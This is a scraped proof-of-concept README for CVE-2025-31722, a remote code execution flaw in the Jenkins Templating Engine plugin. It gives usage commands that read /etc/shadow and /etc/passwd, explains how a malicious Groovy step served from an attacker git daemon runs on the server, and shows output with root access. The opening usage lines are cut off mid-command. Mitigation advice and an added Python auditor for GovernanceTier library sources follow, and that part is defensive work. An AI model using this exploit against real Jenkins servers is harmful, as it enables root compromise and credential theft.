## https://sploitus.com/exploit?id=3D7DEF72-A21C-551F-A718-7039AC1FD5C2
# CVE-2025-31722 — Jenkins Templating Engine RCE
> **For educational and authorized security research purposes only.**
## Description
Sandbox bypass vulnerability in the **Jenkins Templating Engine (JTE) plugin**
```bash
:8080 \
--user attacker \
--pass attacker123 \
--git-host
```
### Custom command
```bash
python3 exploit.py \
--url http://:8080 \
--user attacker \
--pass attacker123 \
--git-host \
--cmd "cat /etc/shadow"
```
### Cleanup
```bash
python3 exploit.py \
--url http://:8080 \
--user attacker \
--pass attacker123 \
--git-host \
--cleanup
```
### Parameters
| Parameter | Description | Required |
|-----------|-------------|----------|
| `--url` | Jenkins base URL | Yes |
| `--user` | User with Item/CREATE+CONFIGURE+BUILD permissions | Yes |
| `--pass` | User password | Yes |
| `--git-host` | Kali IP reachable from Jenkins | Yes |
| `--cmd` | Command to execute on the server (default: `id && hostname && cat /etc/passwd`) | No |
| `--cleanup` | Deletes the folder, job and repo created by the exploit | No |
---
## How the PoC Works
1. **`setup_repo()`** — Creates `~/jte-exploit/evil-lib/steps/evil.groovy` on Kali with the command to execute
2. **`start_git_daemon()`** — Starts `git daemon` on Kali on port 9418
3. **`create_folder()`** — Creates a folder in Jenkins with a `GovernanceTier` pointing to `git://KALI:9418/jte-exploit`
4. **`create_job()`** — Creates a job with `AdHocTemplateFlowDefinition` that declares `evil-lib` and calls `evil()`
5. **`trigger_and_wait()`** — Triggers the build and waits for the result
6. **`print_output()`** — Displays the console output with the RCE result
The git daemon stays alive throughout the entire build cycle and is terminated automatically once the build completes.
---
## Expected Output
```
=================================================================
CVE-2025-31722 — Jenkins Templating Engine RCE
Target : http://10.211.55.10:8080
Git host: 10.211.55.7
Command : id && hostname && cat /etc/passwd
=================================================================
[+] Authenticated as: attacker (id=attacker)
[+] Repo created: /root/jte-exploit
[+] Malicious step: evil-lib/steps/evil.groovy
[+] Git daemon running at git://10.211.55.7:9418/jte-exploit
[+] Folder created
[+] Job created
[+] Build queued
=================================================================
CVE-2025-31722 — RCE OUTPUT
=================================================================
[JTE] ...
uid=0(root) gid=0(root) groups=0(root)
debian
root:x:0:0:root:/root:/bin/bash
...
=================================================================
```
---
## Mitigation
- Update the Templating Engine plugin to version **2.5.4 or later**
- Restrict `Item/CREATE` and `Item/CONFIGURE` permissions to trusted users only
- Enable CSRF protection in Jenkins
- Audit folders with `GovernanceTier` configurations pointing to external repositories
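An added example (not part of the original PoC or the JTE project) for the last mitigation item: it reads Jenkins `config.xml` files, collects the SCM URLs under any element that names `GovernanceTier`, and flags plaintext transports or hosts missing from an allowlist. The allowlist host, the function names and the sample XML layout are assumptions; only the `GovernanceTier` name and the `git://` URL shape come from this page.

```python
import re
import xml.etree.ElementTree as ET
from pathlib import Path
from urllib.parse import urlparse

TRUSTED_HOSTS = {"git.corp.example"}   # assumption: your approved library hosts
PLAINTEXT_SCHEMES = {"git", "http"}    # no authentication or integrity on the wire

def governance_urls(config_xml):
    """Return SCM URLs nested under any element that names GovernanceTier."""
    # Jenkins writes an XML 1.1 declaration that expat may reject; drop it.
    body = re.sub(r"^\s*<\?xml[^>]*\?>", "", config_xml)
    urls = []
    for elem in ET.fromstring(body).iter():
        if "GovernanceTier" in elem.tag or "GovernanceTier" in elem.get("class", ""):
            urls += [u.text.strip() for u in elem.iter("url") if u.text]
    return list(dict.fromkeys(urls))   # de-duplicate, keep order

def classify(url):
    """Return the reasons a library source URL needs review (empty = acceptable)."""
    parsed = urlparse(url)
    host = parsed.hostname
    if host is None and "@" in url:    # scp-style remote: git@host:path
        host = url.split("@", 1)[1].split(":", 1)[0]
    reasons = []
    if parsed.scheme in PLAINTEXT_SCHEMES:
        reasons.append("plaintext transport")
    if host not in TRUSTED_HOSTS:
        reasons.append("host not on allowlist")
    return reasons

def audit(configs):
    """configs maps a config.xml path to its text; returns (path, url, reasons)."""
    return [(path, url, classify(url)) for path, text in configs.items()
            for url in governance_urls(text) if classify(url)]

def audit_home(jenkins_home):
    """Audit every config.xml below $JENKINS_HOME/jobs, nested folders included."""
    files = Path(jenkins_home, "jobs").rglob("config.xml")
    return audit({str(p): p.read_text(encoding="utf-8") for p in files})

# Constructed sample; the element layout is an assumption, not the plugin's schema.
SAMPLE = """<?xml version='1.1' encoding='UTF-8'?>
<folder><properties><tier class="GovernanceTier"><librarySources>
  <scm><url>git://10.211.55.7:9418/jte-exploit</url></scm>
  <scm><url>https://git.corp.example/jte/libs.git</url></scm>
</librarySources></tier></properties></folder>"""
if __name__ == "__main__":
    print(audit({"jobs/demo/config.xml": SAMPLE}))
```

Run `audit_home()` against a copy of the controller's home directory and review each finding with the folder's owner before removing or repointing the library source.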
---
## References
- [Jenkins Security Advisory](https://www.jenkins.io/security/advisories/)
- [JTE Plugin GitHub](https://github.com/jenkinsci/templating-engine-plugin)
---
> **Legal disclaimer:** This PoC is intended solely for educational purposes and testing in controlled environments. Using it against systems without explicit authorization is illegal.